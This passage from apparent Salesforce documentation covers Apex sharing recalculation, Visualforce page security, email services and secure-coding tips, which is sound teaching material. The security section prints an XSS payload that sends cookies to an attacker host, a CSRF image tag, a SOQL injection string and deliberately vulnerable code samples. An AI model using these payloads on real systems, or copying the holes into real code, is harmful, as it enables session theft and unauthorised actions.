Developers can write batch Apex classes that recalculate the Apex managed sharing for a specific custom object. You can
associate these classes with a custom object on its detail page, and execute them if a locking issue prevents Apex from granting
access to a user as defined by the application’s logic. Apex sharing recalculations are also useful for resolving visibility issues
due to coding errors. For example, if a developer corrects a coding error that prevented users from accessing records they should
see, the correction might only affect records created after the code update. To ensure the correction applies to existing records
as well, the developer can run an Apex sharing recalculation to validate sharing on all records.

You can run Apex sharing recalculations from a custom object's detail page. You can also run them programmatically using
the Database.executeBatch method. In addition, Salesforce automatically runs Apex recalculation classes defined for a
custom object every time a custom object's organization wide sharing default access level is updated.

Note:

Salesforce automatically recalculates sharing for all records on an object when its organization-wide sharing default
access level changes. The recalculation includes access granted by sharing rules. In addition, all types of sharing are
removed if the access they grant is redundant. For example, the manual sharing which grants Read Only access to a
user is deleted when the object’s sharing model is changed from Private to Public Read Only.

For information on creating Apex managed sharing and recalculation classes, see the Force.com Apex Code Developer's Guide.

To associate an Apex managed sharing recalculation class with a custom object:

1. From Setup, click Create > Objects.
2. Select the custom object.
3. Click New in the Apex Sharing Recalculations related list.
4. Choose the Apex class that recalculates the Apex sharing for this object. The class you choose must implement the

Database.Batchable interface. You cannot associate the same Apex class multiple times with the same custom object.
5. Click Save.

To run an Apex sharing recalculation:

1. From Setup, click Create > Objects.
2. Select the custom object.
3. Click Recalculate Apex Sharing.

When working with Apex sharing recalculations, note the following:
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• The Apex code that extends the sharing recalculation can process a maximum of five million records. If thisApex code
affects more than five million records, the job fails immediately.

• You can monitor the status of Apex sharing recalculations in the Apex job queue.

• You can associate a maximum of five Apex sharing recalculations per custom object.

• You cannot associate Apex sharing recalculations with standard objects.

See Also:
Creating Apex Sharing Reasons

VISUALFORCE SECURITY

Visualforce Page Security Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

You can specify which users can execute a particular Visualforce page based on their profile or an associated permission set.

Permission for a Visualforce page is checked at the top level only. Once users can access a page, they can execute all Apex
that’s associated with the page. This includes:

• The controller for the page and any Apex classes called from the controller class.

• Any extension classes for the page and any Apex called from an extension.

• Any Apex classes associated with custom components within the page.

• Any classes associated with the page through the use of apex:include or apex:composition.

For example, if page A depends on a controller that calls an Apex class B, and a user has access only to page A but not class
B, the user can still execute the code in page A. Likewise, if a Visualforce page uses a custom component with an associated
controller, security is only checked for the controller associated with the page, not for the controller associated with the
component.

You can set Visualforce page security from:

• A Visualforce page definition

• Permission sets

• Profiles

If users have the “Customize Application” permission, they can access all Visualforce pages in the associated organization.
However, they may still have restrictions related to Apex classes. The “Customize Application” permission doesn’t allow users
to ignore those restrictions in a Visualforce page unless they have Visualforce page access.

Also, to include Apex in a page, users must have the “Author Apex” permission or access to the Apex class.
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Note:  Organizations with Force.com sites or Customer Portals can enable Visualforce pages either by assigning them
to user profiles or by enabling them for the entire site.

See Also:
Security Tips for Apex and Visualforce Development
Visualforce Developer's Guide
Setting Visualforce Page Security from a Page Definition
Setting Visualforce Page Security from Permission Sets
Setting Visualforce Page Security from Profiles

Setting Visualforce Page Security from a Page Definition
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To set Visualforce page security:

1. From Setup, click Develop > Pages.
2. Next to the name of the page that you want to restrict, click Security.
3. Select the profiles that you want to enable from the Available Profiles list and click Add.
4. Select the profiles that you want to disable from the Enabled Profiles list and click Remove.
5. Click Save.

Setting Visualforce Page Security from Permission Sets
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit Visualforce page access settings:

1. From Setup, click Manage Users > Permission Sets.
2. Select a permission set.
3. Click Visualforce Page Access.
4. Click Edit.
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5. Select the Visualforce pages that you want to enable from the Available Visualforce Pages list and click Add, or select the
Visualforce pages that you want to disable from the Enabled Visualforce Pages list and click Remove.

6. Click Save.

Setting Visualforce Page Security from Profiles
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To set Visualforce page security:

1. From Setup, click Manage Users > Profiles.
2. Click the name of the profile you want to modify.
3. Go to the Visualforce Page Access page or related list and click Edit.
4. Select the Visualforce pages that you want to enable from the Available Visualforce Pages list and click Add, or select the

Visualforce pages that you want to disable from the Enabled Visualforce Pages list and click Remove.
5. Click Save.

Security Tips for Apex and Visualforce Development
Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Visualforce is not available in Database.com.

Understanding Security

The powerful combination of Apex and Visualforce pages allow Force.com developers to provide custom functionality and
business logic to Salesforce or create a completely new stand-alone product running inside the Force.com platform. However,
as with any programming language, developers must be cognizant of potential security-related pitfalls.

Salesforce.com has incorporated several security defenses into the Force.com platform itself. However, careless developers can
still bypass the built-in defenses in many cases and expose their applications and customers to security risks. Many of the
coding mistakes a developer can make on the Force.com platform are similar to general Web application security vulnerabilities,
while others are unique to Apex.

To certify an application for AppExchange, it is important that developers learn and understand the security flaws described
here. For additional information, see the Force.com Security Resources page on Developer Force at
http://wiki.developerforce.com/page/Security.

See Also:
Managing Versions
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Cross-Site Scripting (XSS)
Cross-site scripting (XSS) attacks cover a broad range of attacks where malicious HTML or client-side scripting is provided
to a Web application. The Web application includes malicious scripting in a response to a user of the Web application. The
user then unknowingly becomes the victim of the attack. The attacker has used the Web application as an intermediary in the
attack, taking advantage of the victim's trust for the Web application. Most applications that display dynamic Web pages
without properly validating the data are likely to be vulnerable. Attacks against the website are especially easy if input from
one user is intended to be displayed to another user. Some obvious possibilities include bulletin board or user comment-style
websites, news, or email archives.

For example, assume the following script is included in a Force.com page using a script component, an on* event, or a
Visualforce page.

<script>var foo = '{!$CurrentPage.parameters.userparam}';script>var foo =
'{!$CurrentPage.parameters.userparam}';</script>

This script block inserts the value of the user-supplied userparam onto the page. The attacker can then enter the following
value for userparam:

1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2

In this case, all of the cookies for the current page are sent to www.attacker.com as the query string in the request to the
cookie.cgi script. At this point, the attacker has the victim's session cookie and can connect to the Web application as if
they were the victim.

The attacker can post a malicious script using a Website or email. Web application users not only see the attacker's input, but
their browser can execute the attacker's script in a trusted context. With this ability, the attacker can perform a wide variety
of attacks against the victim. These range from simple actions, such as opening and closing windows, to more malicious attacks,
such as stealing data or session cookies, allowing an attacker full access to the victim's session.

For more information on this attack in general, see the following articles:

• http://www.owasp.org/index.php/Cross_Site_Scripting
• http://www.cgisecurity.com/articles/xss-faq.shtml
• http://www.owasp.org/index.php/Testing_for_Cross_site_scripting
• http://www.google.com/search?q=cross-site+scripting

Within the Force.com platform there are several anti-XSS defenses in place. For example, salesforce.com has implemented
filters that screen out harmful characters in most output methods. For the developer using standard classes and output methods,
the threats of XSS flaws have been largely mitigated. However, the creative developer can still find ways to intentionally or
accidentally bypass the default controls. The following sections show where protection does and does not exist.

Existing Protection

All standard Visualforce components, which start with <apex>, have anti-XSS filters in place. For example, the following
code is normally vulnerable to an XSS attack because it takes user-supplied input and outputs it directly back to the user, but
the <apex:outputText> tag is XSS-safe. All characters that appear to be HTML tags are converted to their literal form.
For example, the < character is converted to &lt; so that a literal < displays on the user's screen.

<apex:outputText>
{!$CurrentPage.parameters.userInput}

</apex:outputText>
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Disabling Escape on Visualforce Tags

By default, nearly all Visualforce tags escape the XSS-vulnerable characters. It is possible to disable this behavior by setting
the optional attribute escape="false". For example, the following output is vulnerable to XSS attacks:

<apex:outputText escape="false" value="{!$CurrentPage.parameters.userInput}" />

Programming Items Not Protected from XSS

The following items do not have built-in XSS protections, so take extra care when using these tags and objects. This is because
these items were intended to allow the developer to customize the page by inserting script commands. It does not makes sense
to include anti-XSS filters on commands that are intentionally added to a page.

Custom JavaScript
If you write your own JavaScript, the Force.com platform has no way to protect you. For example, the following code is
vulnerable to XSS if used in JavaScript.

<script>
var foo = location.search;
document.write(foo);

</script>

<apex:includeScript>
The <apex:includeScript> Visualforce component allows you to include a custom script on the page. In these
cases, be very careful to validate that the content is safe and does not include user-supplied data. For example, the
following snippet is extremely vulnerable because it includes user-supplied input as the value of the script text. The value
provided by the tag is a URL to the JavaScript to include. If an attacker can supply arbitrary data to this parameter (as
in the example below), they can potentially direct the victim to include any JavaScript file from any other website.

<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />

Formula Tags
The general syntax of these tags is:{!FUNCTION()} or {!$OBJECT.ATTRIBUTE}. For example, if a developer wanted to
include a user's session ID in a link, they could create the link using the following syntax:

<a
href="http://partner.domain.com/integration/?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}">
Go to portal</a>

Which renders output similar to the following:

<a
href="http://partner.domain.com/integration/?sid=4f0900D30000000Jsbi%21AQoAQNYaPnVyd_6hNdIxXhzQTMaa
SlYiOfRzpM18huTGN3jC0O1FIkbuQRwPc9OQJeMRm4h2UYXRnmZ5wZufIrvd9DtC_ilA&server=https://na1.salesforce.com
/services/Soap/u/13.0/4f0900D30000000Jsbi">Go to portal</a>

Formula expressions can be function calls or include information about platform objects, a user's environment, system
environment, and the request environment. An important feature of these expressions is that data is not escaped during
rendering. Since expressions are rendered on the server, it is not possible to escape rendered data on the client using JavaScript
or other client-side technology. This can lead to potentially dangerous situations if the formula expression references non-system
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data (that is potentially hostile or editable data) and the expression itself is not wrapped in a function to escape the output
during rendering. A common vulnerability is created by the use of the {!$Request.*} expression to access request parameters.

<html>
<head>

<title>{!$Request.title}</title>
</head>
<body>Hello world!</body>

</html>

Unfortunately, the unescaped {!$Request.title} tag also results in a cross-site scripting vulnerability. For example, the
request:

http://example.com/demo/hello.html?title=Adios%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E

results in the output:

<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello
world!</body></html>

The standard mechanism to do server-side escaping is through the use of the SUBSTITUTE() formula tag. Given the placement
of the {!$Request.*} expression in the example, the above attack can be prevented by using the following nested
SUBSTITUTE() calls.

<html>
<head>

<title>{! SUBSTITUTE(SUBSTITUTE($Request.title,"<","<"),">",">")}</title>
</head>
<body>Hello world!</body>

</html>

Depending on the placement of the tag and usage of the data, both the characters needing escaping, as well as their escaped
counterparts, can vary. For instance, this statement:

<script>var ret = "{!$Request.retURL}";script>var ret = "{!$Request.retURL}";</script>

requires that the double quote character be escaped with its URL encoded equivalent of %22 instead of the HTML escaped
", since it is probably going to be used in a link. Otherwise, the request:

http://example.com/demo/redirect.html?retURL= foo%22%3Balert('xss')%3B%2F%2F

results in:

<script>var ret = "foo";alert('xss');//";</script>

Additionally, the ret variable might need additional client-side escaping later in the page if it is used in a way which can
cause included HTML control characters to be interpreted.

Formula tags can also be used to include platform object data. Although the data is taken directly from the user's organization,
it must still be escaped before use to prevent users from executing code in the context of other users (potentially those with
higher privilege levels). While these types of attacks must be performed by users within the same organization, they undermine
the organization's user roles and reduce the integrity of auditing records. Additionally, many organizations contain data which
has been imported from external sources and might not have been screened for malicious content.
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Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) flaws are less of a programming mistake as they are a lack of a defense. The easiest way
to describe CSRF is to provide a very simple example. An attacker has a Web page at www.attacker.com. This could be
any Web page, including one that provides valuable services or information that drives traffic to that site. Somewhere on the
attacker's page is an HTML tag that looks like this:

<img
src="http://www.yourwebpage.com/yourapplication/createuser?email=attacker@attacker.com&type=admin....."
height=1 width=1 />

In other words, the attacker's page contains a URL that performs an action on your website. If the user is still logged into your
Web page when they visit the attacker's Web page, the URL is retrieved and the actions performed. This attack succeeds
because the user is still authenticated to your Web page. This is a very simple example and the attacker can get more creative
by using scripts to generate the callback request or even use CSRF attacks against your AJAX methods.

For more information and traditional defenses, see the following articles:

• http://www.owasp.org/index.php/Cross-Site_Request_Forgery
• http://www.cgisecurity.com/articles/csrf-faq.shtml
• http://shiflett.org/articles/cross-site-request-forgeries

Within the Force.com platform, salesforce.com has implemented an anti-CSRF token to prevent this attack. Every page
includes a random string of characters as a hidden form field. Upon the next page load, the application checks the validity of
this string of characters and does not execute the command unless the value matches the expected value. This feature protects
you when using all of the standard controllers and methods.

Here again, the developer might bypass the built-in defenses without realizing the risk. For example, suppose you have a
custom controller where you take the object ID as an input parameter, then use that input parameter in an SOQL call. Consider
the following code snippet.

<apex:page controller="myClass" action="{!init}"</apex:page>

public class myClass {
public void init() {
Id id = ApexPages.currentPage().getParameters().get('id');
Account obj = [select id, Name FROM Account WHERE id = :id];
delete obj;
return ;

}
}

In this case, the developer has unknowingly bypassed the anti-CSRF controls by developing their own action method. The
id parameter is read and used in the code. The anti-CSRF token is never read or validated. An attacker Web page might
have sent the user to this page using a CSRF attack and provided any value they wish for the id parameter.

There are no built-in defenses for situations like this and developers should be cautious about writing pages that take action
based upon a user-supplied parameter like the id variable in the preceding example. A possible work-around is to insert an
intermediate confirmation page before taking the action, to make sure the user intended to call the page. Other suggestions
include shortening the idle session timeout for the organization and educating users to log out of their active session and not
use their browser to visit other sites while authenticated.
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SOQL Injection
In other programming languages, the previous flaw is known as SQL injection. Apex does not use SQL, but uses its own
database query language, SOQL. SOQL is much simpler and more limited in functionality than SQL. Therefore, the risks
are much lower for SOQL injection than for SQL injection, but the attacks are nearly identical to traditional SQL injection.
In summary SQL/SOQL injection involves taking user-supplied input and using those values in a dynamic SOQL query. If
the input is not validated, it can include SOQL commands that effectively modify the SOQL statement and trick the application
into performing unintended commands.

For more information on SQL Injection attacks see:

• http://www.owasp.org/index.php/SQL_injection
• http://www.owasp.org/index.php/Blind_SQL_Injection
• http://www.owasp.org/index.php/Guide_to_SQL_Injection
• http://www.google.com/search?q=sql+injection

SOQL Injection Vulnerability in Apex

Below is a simple example of Apex and Visualforce code vulnerable to SOQL injection.

<apex:page controller="SOQLController" >
<apex:form>

<apex:outputText value="Enter Name" />
<apex:inputText value="{!name}" />
<apex:commandButton value="Query" action="{!query}“ />

</apex:form>
</apex:page>

public class SOQLController {
public String name {

get { return name;}
set { name = value;}

}
public PageReference query() {

String qryString = 'SELECT Id FROM Contact WHERE ' +
'(IsDeleted = false and Name like \'%' + name + '%\')';

queryResult = Database.query(qryString);
return null;

}
}

This is a very simple example but illustrates the logic. The code is intended to search for contacts that have not been deleted.
The user provides one input value called name. The value can be anything provided by the user and it is never validated. The
SOQL query is built dynamically and then executed with the Database.query method. If the user provides a legitimate
value, the statement executes as expected:

// User supplied value: name = Bob
// Query string
SELECT Id FROM Contact WHERE (IsDeleted = false and Name like '%Bob%')

However, what if the user provides unexpected input, such as:

// User supplied value for name: test%') OR (Name LIKE '
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In that case, the query string becomes:

SELECT Id FROM Contact WHERE (IsDeleted = false AND Name LIKE '%test%') OR (Name LIKE '%')

Now the results show all contacts, not just the non-deleted ones. A SOQL Injection flaw can be used to modify the intended
logic of any vulnerable query.

SOQL Injection Defenses

To prevent a SOQL injection attack, avoid using dynamic SOQL queries. Instead, use static queries and binding variables.
The vulnerable example above can be re-written using static SOQL as follows:

public class SOQLController {
public String name {

get { return name;}
set { name = value;}

}
public PageReference query() {

String queryName = '%' + name + '%';
queryResult = [SELECT Id FROM Contact WHERE

(IsDeleted = false and Name like :queryName)];
return null;

}
}

If you must use dynamic SOQL, use the escapeSingleQuotes method to sanitize user-supplied input. This method adds
the escape character (\) to all single quotation marks in a string that is passed in from a user. The method ensures that all
single quotation marks are treated as enclosing strings, instead of database commands.

Data Access Control
The Force.com platform makes extensive use of data sharing rules. Each object has permissions and may have sharing settings
for which users can read, create, edit, and delete. These settings are enforced when using all standard controllers.

When using an Apex class, the built-in user permissions and field-level security restrictions are not respected during execution.
The default behavior is that an Apex class has the ability to read and update all data within the organization. Because these
rules are not enforced, developers who use Apex must take care that they do not inadvertently expose sensitive data that would
normally be hidden from users by user permissions, field-level security, or organization-wide defaults. This is particularly true
for Visualforce pages. For example, consider the following Apex pseudo-code:

public class customController {
public void read() {

Contact contact = [SELECT id FROM Contact WHERE Name = :value];
}

}

In this case, all contact records are searched, even if the user currently logged in would not normally have permission to view
these records. The solution is to use the qualifying keywords with sharing when declaring the class:

public with sharing class customController {
. . .

}

The with sharing keyword directs the platform to use the security sharing permissions of the user currently logged in,
rather than granting full access to all records.
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EMAIL SERVICES

What are Email Services?
Available in: Enterprise, Unlimited and Developer Editions

Use of email services in installed AppExchange packages also available in: Group and Professional Editions

User Permissions Needed

“Modify All Data”To configure Apex email services and email service addresses:

“Author Apex”To create Apex classes:

Email services are automated processes that use Apex classes to process the contents, headers, and attachments of inbound
email. For example, you can create an email service that automatically creates contact records based on contact information
in messages.

You can associate each email service with one or more Salesforce-generated email addresses to which users can send messages
for processing. To give multiple users access to a single email service, you can:

• Associate multiple Salesforce-generated email addresses with the email service and allocate those addresses to users.

• Associate a single Salesforce-generated email address with the email service, and write an Apex class that executes according
to the user accessing the email service. For example, you can write an Apex class that identifies the user based on the user's
email address and creates records on behalf of that user.

To use email services, from Setup, click Develop > Email Services.

• Click New Email Service to define a new email service.

• Select an existing email service to view its configuration, activate or deactivate it, and view or specify addresses for that
email service.

• Click Edit to make changes to an existing email service.

• Click Delete to delete an email service.

Note:  Before deleting email services, you must delete all associated email service addresses.

When defining email services, note the following:

• An email service only processes messages it receives at one of its addresses.

• Salesforce limits the total number of messages that all email services combined, including On-Demand Email-to-Case,
can process daily. Messages that exceed this limit are bounced, discarded, or queued for processing the next day, depending
on how you configure the failure response settings for each email service. Salesforce calculates the limit by multiplying the
number of user licenses by 1,000, up to a daily maximum of 1,000,000. For example, if you have ten licenses, your
organization can process up to 10,000 email messages a day.
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• Email service addresses that you create in your sandbox cannot be copied to your production organization.

• For each email service, you can tell Salesforce to send error email messages to a specified address instead of the sender's
email address.

• Email services rejects email messages and notifies the sender if the email (combined body text, body HTML and attachments)
exceeds approximately 10 MB (varies depending on language and character set).

See Also:
Defining Email Service Addresses
Defining Email Services
Using the InboundEmail Object

Defining Email Service Addresses
Available in: Enterprise, Unlimited and Developer Editions

Use of email services in installed AppExchange packages also available in: Group and Professional Editions

User Permissions Needed

“Modify All Data”To configure Apex email services and email service addresses:

“Author Apex”To create Apex classes:

1. Click Develop > Email Services.
2. Choose the email service for which you want to define an address.
3. Click New Email Address, or click Edit to change the configuration for an existing email service address. To delete an

email service address, click View and Delete.
4. In the Email Address field, enter the local-part of the email service address. Salesforce generates a unique domain-part

for each email service address to ensure that no two email service addresses are identical. The generated domain-part
appears to the right of the Email Address field.

Tip:  For the local-part of a Salesforce email address, all alphanumeric characters are valid, plus the following
special characters: !#$%&'*/=?^_+-`{|}~. For the domain-part of a Salesforce email address, only alphanumeric
characters are valid, as well as hyphen (-). The dot character (.) is also valid in both the local-part and domain-part
as long as it is not the first or last character.

Salesforce email addresses are case-insensitive.

5. Select the Active checkbox if you want the email service address to be activated when you click Save.
6. Choose the Context User. The email service assumes the permissions of the context user when processing the messages

this address receives. For example, if the email service is configured to modify contact records upon receiving updated
contact information, the email service only modifies a record if the context user has permission to edit the record.
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Important:  Choose a context user that has permission to execute the Apex class that the email service is configured
to use.

7. Optionally, configure this email service address to only accept messages from certain senders by listing their email addresses
and domains in the Accept Email From text box. Separate multiple entries with commas. For example:
george@mycompany.com, yahoo.com, gmail.com. If the Accept Email From text box has a value and the email service
receives a message from an unlisted email address or domain, the email service performs the action specified in the
Unauthorized Sender Action failure response setting.

Leave this field blank if you want the email service to receive email from any email address.

Note:

If both the email service and email service address are configured to only accept messages from certain senders,
the email service only processes messages from senders that are listed in the Accept Email From text boxes on
both the email service and the email service address.

8. Click Save to save your changes, or Save and New to define another inbound email address for this email service.

See Also:
Defining Email Services
What are Email Services?

Defining Email Services
Available in: Enterprise, Unlimited and Developer Editions

Use of email services in installed AppExchange packages also available in: Group and Professional Editions

User Permissions Needed

“Modify All Data”To configure Apex email services and email service addresses:

“Author Apex”To create Apex classes:

To define an email service:

1. Click Develop > Email Services.
2. Click New Email Service, or click Edit to change an existing email service.
3. Specify the name of the email service.
4. Choose the Apex class you want this email service to use to process messages. The Apex class you choose must implement

the Messaging.InboundEmailHandler interface. For example:

global class myHandler implements Messaging.InboundEmailHandler {
global Messaging.InboundEmailResult handleInboundEmail(Messaging.InboundEmail

email, Messaging.InboundEnvelope envelope) {
Messaging.InboundEmailResult result = new Messaging.InboundEmailresult();
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return result;
}

}

For information on the InboundEmail object, see Using the InboundEmail Object on page 3632.
5. Choose the types of attachments you want the email service to accept. The options are:

None

The email service accepts the message but discards any attachment.

Text Attachments Only

The email service only accepts the following types of attachments:
• Attachments with a Multipurpose Internet Mail Extension (MIME) type of text.
• Attachments with a MIME type of application/octet-stream and a file name that ends with either a

.vcf or .vcs extension. These are saved as text/x-vcard and text/calendar MIME types, respectively.

Messages with attachments other than these types are accepted, but the attachments are discarded.

Binary Attachments Only

The email service only accepts binary attachments, such as image, audio, application, and video files. Binary attachments
have a limit of 5 MB per attachment.

Messages with attachments that are not binary are accepted, but the attachments are discarded.

All

The email service accepts any type of attachment.

Note:  An email service can only process attachments if you configure the email service to accept attachments and
use an Apex class that processes the types of attachments the email service accepts.

Also, note that email services cannot accept inline attachments, such as graphics inserted in email messages.

6. Optionally, select the Advanced Email Security Settings checkbox to configure the email service to verify the
legitimacy of the sending server before processing a message. The email service uses the following authentication protocols
to verify the sender's legitimacy:

• SPF
• SenderId
• DomainKeys

If the sending server passes at least one of these protocols and does not fail any, the email service accepts the email. If the
server fails a protocol or does not support any of the protocols, the email service performs the action specified in the
Unauthenticated Sender Action failure response setting.

Tip:  Before selecting the Authenticate Senders checkbox, ensure that the senders that you expect to use
the email service support at least one of the authentication protocols listed above. For information on these
authentication protocols, see the following websites:

• www.openspf.org
• www.microsoft.com/mscorp/safety/technologies/senderid/default.mspx
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7. Email services rejects email messages and notifies the sender if the email (combined body text, body HTML and attachments)
exceeds approximately 10 MB (varies depending on language and character set).

8. You can convert text attachments to binary attachments.
9. Optionally, configure this email service only to accept messages from certain senders by listing their email addresses and

domains in the Accept Email From text box. Separate multiple entries with commas. For example:
george@mycompany.com, yahoo.com, gmail.com. If the Accept Email From text box has a value and the email service
receives a message from an unlisted email address or domain, the email service performs the action specified in the
Unauthorized Sender Action failure response setting.

Leave this field blank if you want the email service to receive email from any email address.

Note:  You can also authorize email addresses and domains at the email service address-level. See Defining Email
Service Addresses on page 3628.

If both the email service and email service address are configured to only accept messages from certain senders,
the email service only processes messages from senders that are listed in the Accept Email From text boxes on
both the email service and the email service address.

10. Select the Active checkbox if you want the email service to be activated when you click Save.
11. Configure the failure response settings, which determine how the email service responds if an attempt to access this email

service fails for the following reasons:

Over Email Rate Limit Action

Determines what the email service does with messages if the total number of messages processed by all email services
combined has reached the daily limit for your organization. Salesforce calculates the limit by multiplying the number
of user licenses by 1,000, up to a daily maximum of 1,000,000. For example, if you have ten licenses, your organization
can process up to 10,000 email messages a day.

Deactivated Email Address Action

Determines what the email service does with messages received at an email address that is inactive.

Deactivated Email Service Action

Determines what the email service does with messages it receives when the email service itself is inactive.

Unauthenticated Sender Action

Determines what the email service does with messages that fail or do not support any of the authentication protocols
if the Authenticate Senders checkbox is selected.

Unauthorized Sender Action

Determines what the email service does with messages received from senders who are not listed in the Accept From
Email text box on either the email service or email service address.

The failure response options are:

Bounce Message

The email service returns the message to the sender or to the Automated Case User for On-Demand
Email-to-Case, with a notification that explains why the message was rejected.

Discard Message

The email service deletes the message without notifying the sender.
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Requeue Message (Over Email Rate Limit Action Only)

The email service queues the message for processing in the next 24 hours. If the message is not processed within 24
hours, the email service returns the message to the sender with a notification that explains why the message was
rejected.

12. To send error email messages to a specified address instead of the sender's email address, select Enable Error Routing
and specify the destination email address in Route Error Emails to This Email Address. This prevents the
sender being notified when email services cannot process an incoming email.

13. Click Save to save your changes, or Save and New Email Address to create email addresses for this email service, as
described in Defining Email Service Addresses on page 3628.

See Also:
Defining Email Service Addresses
What are Email Services?

Using the InboundEmail Object
Available in: Enterprise, Unlimited and Developer Editions

For every email the Apex email service domain receives, Salesforce creates a separate InboundEmail object that contains the
contents and attachments of that email. You can use Apex classes that implement the Messaging.InboundEmailHandler
interface to handle an inbound email message. Using the handleInboundEmail method in that class, you can access an
InboundEmail object to retrieve the contents, headers, and attachments of inbound email messages, as well as perform many
functions.

Note:  For information on the Apex email service, see What are Email Services? on page 3627.

Example 1: Create Tasks for Contacts

The following is an example of how you can look up a contact based on the inbound email address and create a new task.

global class CreateTaskEmailExample implements Messaging.InboundEmailHandler {

global Messaging.InboundEmailResult handleInboundEmail(Messaging.inboundEmail email,
Messaging.InboundEnvelope env){

// Create an InboundEmailResult object for returning the result of the
// Apex Email Service
Messaging.InboundEmailResult result = new Messaging.InboundEmailResult();

String myPlainText= '';

// Add the email plain text into the local variable
myPlainText = email.plainTextBody;

// New Task object to be created
Task[] newTask = new Task[0];

// Try to look up any contacts based on the email from address
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// If there is more than one contact with the same email address,
// an exception will be thrown and the catch statement will be called.
try {
Contact vCon = [SELECT Id, Name, Email
FROM Contact
WHERE Email = :email.fromAddress
LIMIT 1];

// Add a new Task to the contact record we just found above.
newTask.add(new Task(Description = myPlainText,

Priority = 'Normal',
Status = 'Inbound Email',
Subject = email.subject,
IsReminderSet = true,
ReminderDateTime = System.now()+1,
WhoId = vCon.Id));

// Insert the new Task
insert newTask;

System.debug('New Task Object: ' + newTask );
}
// If an exception occurs when the query accesses
// the contact record, a QueryException is called.
// The exception is written to the Apex debug log.
catch (QueryException e) {

System.debug('Query Issue: ' + e);
}

// Set the result to true. No need to send an email back to the user
// with an error message
result.success = true;

// Return the result for the Apex Email Service
return result;
}

}

Example 2: Handle Unsubscribe Email

Companies that send marketing email to their customers and prospects need to provide a way to let the recipients unsubscribe.
The following is an example of how an email service can process unsubscribe requests. The code searches the subject line of
inbound email for the word “unsubscribe.” If the word is found, the code finds all contacts and leads that match the From
email address and sets the Email Opt Out field (HasOptedOutOfEmail) to True.

Global class unsubscribe implements Messaging.inboundEmailHandler{

Global Messaging.InboundEmailResult handleInboundEmail(Messaging.InboundEmail email,
Messaging.InboundEnvelope env ) {

// Create an inboundEmailResult object for returning
// the result of the email service.
Messaging.InboundEmailResult result = new Messaging.InboundEmailResult();

// Create contact and lead lists to hold all the updated records.
List<Contact> lc = new List <contact>();
List<Lead> ll = new List <lead>();

// Convert the subject line to lower case so the program can match on lower case.
String mySubject = email.subject.toLowerCase();
// The search string used in the subject line.
String s = 'unsubscribe';

// Check the variable to see if the word "unsubscribe" was found in the subject
line.
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Boolean unsubMe;
// Look for the word "unsubcribe" in the subject line.
// If it is found, return true; otherwise, return false.
unsubMe = mySubject.contains(s);

// If unsubscribe is found in the subject line, enter the IF statement.

if (unsubMe == true) {

try {

// Look up all contacts with a matching email address.

for (Contact c : [SELECT Id, Name, Email, HasOptedOutOfEmail
FROM Contact
WHERE Email = :env.fromAddress
AND hasOptedOutOfEmail = false
LIMIT 100]) {

// Add all the matching contacts into the list.
c.hasOptedOutOfEmail = true;
lc.add(c);

}
// Update all of the contact records.
update lc;

}
catch (System.QueryException e) {

System.debug('Contact Query Issue: ' + e);
}

try {
// Look up all leads matching the email address.
for (Lead l : [SELECT Id, Name, Email, HasOptedOutOfEmail

FROM Lead
WHERE Email = :env.fromAddress
AND isConverted = false
AND hasOptedOutOfEmail = false
LIMIT 100]) {

// Add all the leads to the list.
l.hasOptedOutOfEmail = true;
ll.add(l);

System.debug('Lead Object: ' + l);
}
// Update all lead records in the query.
update ll;

}

catch (System.QueryException e) {
System.debug('Lead Query Issue: ' + e);

}

System.debug('Found the unsubscribe word in the subject line.');
}
else {

System.debug('No Unsuscribe word found in the subject line.' );
}
// Return True and exit.
// True confirms program is complete and no emails
// should be sent to the sender of the unsubscribe request.
result.success = true;
return result;
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}
}

@isTest
private class unsubscribeTest {

// The following test methods provide adequate code coverage
// for the unsubscribe email class.
// There are two methods, one that does the testing
// with a valid "unsubcribe" in the subject line
// and one the does not contain "unsubscribe" in the
// subject line.
static testMethod void testUnsubscribe() {

// Create a new email and envelope object.
Messaging.InboundEmail email = new Messaging.InboundEmail() ;
Messaging.InboundEnvelope env = new Messaging.InboundEnvelope();

// Create a new test lead and insert it in the test method.
Lead l = new lead(firstName='John',

lastName='Smith',
Company='Salesforce',
Email='user@acme.com',
HasOptedOutOfEmail=false);

insert l;

// Create a new test contact and insert it in the test method.
Contact c = new Contact(firstName='john',

lastName='smith',
Email='user@acme.com',
HasOptedOutOfEmail=false);

insert c;

// Test with the subject that matches the unsubscribe statement.
email.subject = 'test unsubscribe test';
env.fromAddress = 'user@acme.com';

// Call the class and test it with the data in the testMethod.
unsubscribe unsubscribeObj = new unsubscribe();
unsubscribeObj.handleInboundEmail(email, env );

}

static testMethod void testUnsubscribe2() {

// Create a new email and envelope object.
Messaging.InboundEmail email = new Messaging.InboundEmail();
Messaging.InboundEnvelope env = new Messaging.InboundEnvelope();

// Create a new test lead and insert it in the test method.
Lead l = new lead(firstName='john',

lastName='smith',
Company='Salesforce',
Email='user@acme.com',
HasOptedOutOfEmail=false);

insert l;

// Create a new test contact and insert it in the test method.
Contact c = new Contact(firstName='john',

lastName='smith',
Email='user@acme.com',
HasOptedOutOfEmail=false);

insert c;

// Test with a subject that does not contain "unsubscribe."
email.subject = 'test';
env.fromAddress = 'user@acme.com';
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// Call the class and test it with the data in the test method.
unsubscribe unsubscribeObj = new unsubscribe();
unsubscribeObj.handleInboundEmail(email, env );

}
}

InboundEmail Object

An InboundEmail object has the following fields.

DescriptionTypeName

A list of binary attachments received with the email,
if any.

Examples of binary attachments include image, audio,
application, and video files.

InboundEmail.BinaryAttachment[]binaryAttachments

A list of carbon copy (CC) addresses, if any.String[]ccAddresses

The email address that appears in the From field.StringfromAddress

The name that appears in the From field, if any.StringfromName

A list of the RFC 2822 headers in the email, including:InboundEmail.Header[]headers

